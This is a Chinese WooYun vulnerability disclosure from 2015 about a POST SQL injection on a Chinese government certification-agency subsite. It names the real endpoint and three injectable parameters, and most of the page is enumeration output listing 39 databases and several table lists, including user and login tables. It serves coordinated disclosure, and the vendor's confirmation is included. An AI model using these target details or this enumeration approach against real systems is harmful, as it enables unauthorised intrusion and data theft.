当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110580

漏洞标题:国家某管理委员会信息中心子站存在多处SQL注射。造成39库泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: Yang

提交时间:2015-05-06 18:18

修复时间:2015-06-23 17:34

公开时间:2015-06-23 17:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经确认,细节仅向厂商公开
2015-05-19: 细节向核心白帽子及相关领域专家公开
2015-05-29: 细节向普通白帽子公开
2015-06-08: 细节向实习白帽子公开
2015-06-23: 细节向公众公开

简要描述:

国家某管理委员会信息中心子站存在post SQL注射。造成39库泄露

详细说明:

漏洞位于国家认证认可监督管理委员会信息中心子站
存在一个post注射
http://cast.cnca.gov.cn/CastQuery/queryData.xhtml?action=stInfo (POST)
draftDept=88952634&drafter=88952634&achOutline=88952634&source=88952634&state=88952634&proName=88952634
三个参数:
Parameter: source (POST)
Parameter: draftDept (POST)
Parameter: drafter (POST)

2.png


available databases [39]:
[*] caas
[*] CAIT
[*] caitoa
[*] cast
[*] cnas
[*] cnas_uat
[*] cnca_prod
[*] cnca_test
[*] cnca_test_120925
[*] cnca_test_lz
[*] cncat_est
[*] distmodel
[*] east
[*] FOOD
[*] foodcert
[*] foodcert_test
[*] foodReg
[*] frm_demo
[*] guoyy
[*] J_WFDB
[*] kebiao
[*] labnew
[*] lumigent
[*] master
[*] model
[*] msdb
[*] NetViewDb
[*] Northwind
[*] pubs
[*] Scheme
[*] search_cnca
[*] tempdb
[*] test_explog
[*] testeaiform
[*] testingdbzy
[*] testoa
[*] tianjinlab
[*] wdxt
[*] wfdb


漏洞证明:

2.png


但是不知道为何跑表只跑出来一点点
技术太菜

available databases [39]:
[*] caas
[*] CAIT
[*] caitoa
[*] cast
[*] cnas
[*] cnas_uat
[*] cnca_prod
[*] cnca_test
[*] cnca_test_120925
[*] cnca_test_lz
[*] cncat_est
[*] distmodel
[*] east
[*] FOOD
[*] foodcert
[*] foodcert_test
[*] foodReg
[*] frm_demo
[*] guoyy
[*] J_WFDB
[*] kebiao
[*] labnew
[*] lumigent
[*] master
[*] model
[*] msdb
[*] NetViewDb
[*] Northwind
[*] pubs
[*] Scheme
[*] search_cnca
[*] tempdb
[*] test_explog
[*] testeaiform
[*] testingdbzy
[*] testoa
[*] tianjinlab
[*] wdxt
[*] wfdb
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: msdb
[83 tables]
+--------------------------------------------+
| RTblClassDefs                              |
| RTblClassExtension                         |
| RTblDBMProps                               |
| RTblDBXProps                               |
| RTblDTMProps                               |
| RTblDTSProps                               |
| RTblDatabaseVersion                        |
| RTblEQMProps                               |
| RTblEnumerationDef                         |
| RTblEnumerationValueDef                    |
| RTblGENProps                               |
| RTblIfaceDefs                              |
| RTblIfaceHier                              |
| RTblIfaceMem                               |
| RTblMDSProps                               |
| RTblNamedObj                               |
| RTblOLPProps                               |
| RTblParameterDef                           |
| RTblPropDefs                               |
| RTblProps                                  |
| RTblRelColDefs                             |
| RTblRelshipDefs                            |
| RTblRelshipProps                           |
| RTblRelships                               |
| RTblSIMProps                               |
| RTblScriptDefs                             |
| RTblSites                                  |
| RTblSumInfo                                |
| RTblTFMProps                               |
| RTblTypeInfo                               |
| RTblTypeLibs                               |
| RTblUMLProps                               |
| RTblUMXProps                               |
| RTblVersionAdminInfo                       |
| RTblVersions                               |
| RTblWorkspaceItems                         |
| backupfile                                 |
| backupmediafamily                          |
| backupmediaset                             |
| backupset                                  |
| log_shipping_databases                     |
| log_shipping_monitor                       |
| log_shipping_plan_databases                |
| log_shipping_plan_history                  |
| log_shipping_plans                         |
| log_shipping_primaries                     |
| log_shipping_secondaries                   |
| logmarkhistory                             |
| mswebtasks                                 |
| restorefile                                |
| restorefilegroup                           |
| restorehistory                             |
| sqlagent_info                              |
| sysalerts                                  |
| syscachedcredentials                       |
| syscategories                              |
| sysconstraints                             |
| sysdbmaintplan_databases                   |
| sysdbmaintplan_history                     |
| sysdbmaintplan_jobs                        |
| sysdbmaintplans                            |
| sysdownloadlist                            |
| sysdtscategories                           |
| sysdtspackagelog                           |
| sysdtspackages                             |
| sysdtssteplog                              |
| sysdtstasklog                              |
| sysjobhistory                              |
| sysjobs                                    |
| sysjobs_view                               |
| sysjobschedules                            |
| sysjobservers                              |
| sysjobsteps                                |
| sysnotifications                           |
| sysoperators                               |
| syssegments                                |
| systargetservergroupmembers                |
| systargetservergroups                      |
| systargetservers                           |
| systargetservers_view                      |
| systaskids                                 |
| systasks                                   |
| systasks_view                              |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors                                    |
| discounts                                  |
| employee                                   |
| jobs                                       |
| pub_info                                   |
| publishers                                 |
| roysched                                   |
| sales                                      |
| stores                                     |
| sysconstraints                             |
| syssegments                                |
| titleauthor                                |
| titles                                     |
| titleview                                  |
+--------------------------------------------+
Database: cast
[7 tables]
+--------------------------------------------+
| CNCA_STD_INFO                              |
| CNCA_USER                                  |
| ST_ACHIEVEMENT                             |
| ST_BASE_INFO                               |
| dtproperties                               |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: master
[37 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| MSreplication_options                      |
| dtproperties                               |
| spt_datatype_info                          |
| spt_datatype_info_ext                      |
| spt_fallback_db                            |
| spt_fallback_dev                           |
| spt_fallback_usg                           |
| spt_monitor                                |
| spt_provider_types                         |
| spt_server_info                            |
| spt_values                                 |
| sysconstraints                             |
| syslogins                                  |
| sysoledbusers                              |
| sysopentapes                               |
| sysremotelogins                            |
| syssegments                                |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories                                 |
| CustomerCustomerDemo                       |
| CustomerDemographics                       |
| Customers                                  |
| EmployeeTerritories                        |
| Employees                                  |
| Invoices                                   |
| Orders                                     |
| Products                                   |
| Region                                     |
| Shippers                                   |
| Suppliers                                  |
| Territories                                |
| Alphabetical list of products              |
| Category Sales for 1997                    |
| Current Product List                       |
| Customer and Suppliers by City             |
| Order Details Extended                     |
| Order Details                              |
| Order Subtotals                            |
| Orders Qry                                 |
| Product Sales for 1997                     |
| Products Above Average Price               |
| Products by Category                       |
| Quarterly Orders                           |
| Sales Totals by Amount                     |
| Sales by Category                          |
| Summary of Sales by Quarter                |
| Summary of Sales by Year                   |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+


难道对其他表没有权限了???

修复方案:

版权声明:转载请注明来源 Yang@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-09 17:33

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向北京市政府信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评论